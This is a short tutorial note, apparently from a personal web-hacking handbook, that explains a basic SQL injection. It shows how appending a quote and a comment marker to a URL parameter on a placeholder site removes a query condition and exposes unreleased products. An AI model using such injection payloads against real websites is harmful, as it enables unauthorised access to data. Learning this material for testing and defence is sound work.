handbook/tools/3.Web-Hacking/4.Injection/SQL/Commands/SQL-injection/1 - Retrieving Hidden Data.md
2024-08-31 01:07:22 +02:00


## Retrieving Hidden Data
Target URL: https://insecure-website.com/products?category=Gifts
```
SELECT * FROM products WHERE category = 'Gifts' AND released = 1
```
Exploit URL: https://insecure-website.com/products?category=Gifts' --
```
SELECT * FROM products WHERE category = 'Gifts'--' AND released = 1
```
- `--` is a comment indicator in SQL, so the rest of the query (`' AND released = 1`) is ignored.

As a result, all products in the category are displayed, including unreleased products.